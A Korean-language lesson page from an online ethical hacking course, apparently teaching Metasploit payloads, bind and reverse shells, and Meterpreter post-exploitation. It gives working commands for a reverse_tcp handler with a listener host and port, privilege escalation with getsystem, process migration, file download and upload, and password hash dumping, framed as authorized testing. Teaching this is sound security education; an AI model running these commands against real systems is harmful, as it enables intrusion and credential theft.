0Pricing
Ethical Hacking Academy · 강의

페이로드와 Meterpreter

침투 후 셸

페이로드와 Meterpreter은(는) CoddyKit의 무료 Ethical Hacking Academy 강의입니다. 이것은 4개 중 3번째 강의입니다. 아래에서 전체 강의를 무료로 읽을 수 있으며, 내장 코드 에디터와 24/7 AI 튜터와 함께 브라우저에서 직접 실습할 수 있습니다. 이 강의는 Ethical Hacking Academy 학습 경로의 일부이며, 진행 상황이 웹과 CoddyKit 앱에 동기화됩니다. Ethical Hacking Academy 강의에는 총 4개의 강의가 포함되어 있습니다.

페이로드란 무엇인가요

페이로드는 익스플로잇이 성공한 후 대상에서 실행되는 코드입니다. 단일 명령 실행부터 완전한 대화형 셸 열기까지, 다음에 수행할 수 있는 작업을 결정합니다.

적절한 페이로드를 선택하려면 대상 OS, 네트워크 구성, 필요한 접근 수준을 고려해야 합니다.

단계형과 비단계형

페이로드는 두 가지 전달 방식으로 제공됩니다.

  • 단계형(meterpreter/reverse_tcp의 /에 주의): 먼저 작은 스텁을 보낸 후 전체 페이로드를 다운로드합니다. 초기 흔적이 더 작습니다.
  • 비단계형(meterpreter_reverse_tcp의 _에 주의): 전체 페이로드를 한 번에 전달합니다. 불안정한 네트워크에서 더 안정적입니다.

바인드 셸과 리버스 셸

연결 방향은 두 가지입니다.

  • 바인드 셸: 대상이 포트를 열고 기다리면 사용자가 대상에 연결합니다. 방화벽에 차단되는 경우가 많습니다.
  • 리버스 셸: 대상이 사용자에게 다시 연결합니다(LHOST/LPORT). 일반적으로 외부 연결을 허용하는 방화벽을 통과하기 쉽습니다.

이러한 이유로 리버스 페이로드가 일반적인 기본값입니다.

미터프리터 알아보기

미터프리터는 메타스플로이트의 고급 페이로드입니다. 기본 명령 셸과 달리 메모리에서 실행되고, 암호화된 채널로 통신하며, 익스플로잇 후 작업을 위한 풍부한 명령 집합을 제공합니다.

디스크에 파일을 쓰지 않으므로 별도의 실행 파일을 생성하는 것보다 흔적을 덜 남깁니다.

미터프리터 핵심 명령

미터프리터 세션을 확보한 후에는 기본 명령을 사용해 대상의 상태를 파악할 수 있습니다.

sysinfo      # OS, architecture, hostname
getuid       # current user context
ps           # running processes
pwd  ls  cd  # filesystem navigation

파일 전송

미터프리터는 간단한 명령으로 사용자 컴퓨터와 대상 사이에서 파일을 이동할 수 있어, 승인된 테스트에서 증거를 가져오거나 도구를 준비하는 데 유용합니다.

download C:\\Users\\admin\\secret.txt /tmp/
upload /tmp/tool.exe C:\\Windows\\Temp\\

시스템 셸로 전환하기

shell 명령을 사용하면 미터프리터에서 대상의 기본 명령 해석기(cmd.exe 또는 /bin/sh)로 전환하여 OS 수준의 명령을 직접 실행할 수 있습니다.

exit를 입력하면 세션을 잃지 않고 미터프리터 프롬프트로 돌아갑니다.

shell
# C:\> whoami
# exit  -> back to meterpreter

권한 상승

대개 제한된 권한으로 대상에 진입하게 됩니다. 미터프리터를 사용하면 권한을 상승할 수 있습니다.

  • getsystem은 Windows에서 SYSTEM을 얻기 위해 알려진 기법을 시도합니다.
  • local_exploit_suggester 사후 모듈은 호스트에 적합한 로컬 권한 상승 익스플로잇을 추천합니다.

더 높은 권한을 얻으면 자격 증명 덤프와 더욱 깊은 접근이 가능해집니다.

getsystem
run post/multi/recon/local_exploit_suggester

프로세스 마이그레이션

세션은 프로세스 내부에서 실행됩니다. 해당 프로세스가 불안정하거나 종료될 가능성이 높다면, 세션을 유지하기 위해 더 안정적이고 장시간 실행되는 프로세스로 migrate하십시오.

자신의 권한 수준과 일치하는 프로세스로 마이그레이션하면 정상적인 활동처럼 보이는 데 도움이 되며 사용자 컨텍스트를 바꿀 수도 있습니다.

ps
migrate 1340     # migrate into a stable PID

접근 유지

미터프리터에는 승인된 보안 평가 중 유용한 데이터를 수집하는 기능이 포함되어 있습니다. 예를 들어 hashdump는 암호 해시를 수집하고, 키 입력 수집 도구는 입력 캡처의 영향을 입증하는 데 사용됩니다.

이러한 기능은 합의된 범위 안에서만 사용하고, 모든 내용을 고객 보고서에 기록하십시오.

hashdump
run post/windows/gather/checkvm

핸들러

리버스 페이로드가 연결을 받으려면 사용자 측에서 연결을 수신 대기하는 무언가가 필요합니다. multi/handler 모듈이 그 역할을 합니다. 페이로드를 생성할 때 사용한 것과 동일한 페이로드, LHOST, LPORT로 구성합니다.

콘솔 외부에서 msfvenom 페이로드를 전달할 때 특히 중요합니다. 먼저 핸들러를 시작한 다음 대상에서 페이로드를 실행하십시오.

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.14.2
set LPORT 4444
exploit -j

빠른 확인

제한적인 방화벽을 우회하는 페이로드를 고르십시오.

복습

페이로드와 미터프리터에 대해 배웠습니다.

  • 페이로드는 단계형(/) 또는 비단계형(_), 바인드 또는 리버스일 수 있으며, 리버스 방식이 일반적으로 방화벽에 더 잘 대응합니다.
  • 미터프리터는 암호화된 채널을 통해 메모리에서 실행되며 다양한 명령을 제공합니다.
  • 핵심 작업: sysinfo, getuid, ps, download/upload, shell
  • getsystem과 local_exploit_suggester로 권한을 상승하고, 안정성을 위해 migrate를 사용합니다.
  • 정보 수집 기능은 범위 안에서만 사용하고 모든 내용을 기록합니다.

다음 주제: 익스플로잇 후 작업 모듈, 피벗, 정보 수집

자주 묻는 질문

“페이로드와 Meterpreter” 강의는 무료인가요?

네 — “페이로드와 Meterpreter” 전체 내용을 이 웹사이트에서 무료로 읽을 수 있습니다. 인터랙티브하게 실습하려면(내장 코드 에디터와 24/7 AI 튜터), CoddyKit PRO로 업그레이드하면 Ethical Hacking Academy 강의 전체를 잠금 해제할 수 있습니다. Ethical Hacking Academy 강의에는 총 4개의 강의가 포함되어 있습니다.

“페이로드와 Meterpreter”에서 뭘 배우나요?

침투 후 셸 브라우저에서 직접 실행하는 실습 코드로 Ethical Hacking Academy을(를) 배우며, 24/7 AI 튜터가 강의를 진행하면서 질문에 답변해줍니다.

Ethical Hacking Academy을(를) 시작하는 데 경험이 필요한가요?

사전 경험은 필요하지 않습니다. CoddyKit의 Ethical Hacking Academy은(는) 초급자부터 고급 학습자까지를 위해 구성되어 있으므로, 여기서 시작하거나 처음부터 시작할 수 있으며 자신의 속도대로 진행할 수 있습니다. 이것은 4개 중 3번째 강의입니다.

“페이로드와 Meterpreter” 강의는 얼마나 걸리나요?

대부분의 CoddyKit 강의는 약 5~10분이 소요됩니다. 각 강의는 간결하고 인터랙티브하여 꾸준한 진행이 가능하며, 웹과 앱에서 중단한 부분부터 바로 시작할 수 있습니다.

이 Ethical Hacking Academy 강의에서 코드를 작성하고 실행할 수 있나요?

네. 모든 Ethical Hacking Academy 강의에는 내장 코드 에디터가 포함되어 있으므로, 브라우저에서 바로 실제 코드를 작성하고 실행한 후 즉시 AI 피드백을 받을 수 있습니다 — 로컬 설정이 필요 없습니다.

이 강의의 모든 강의

  1. Metasploit 아키텍처
  2. 익스플로잇 검색 및 사용
  3. 페이로드와 Meterpreter
  4. 침투 후 모듈
← Ethical Hacking Academy(으)로 돌아가기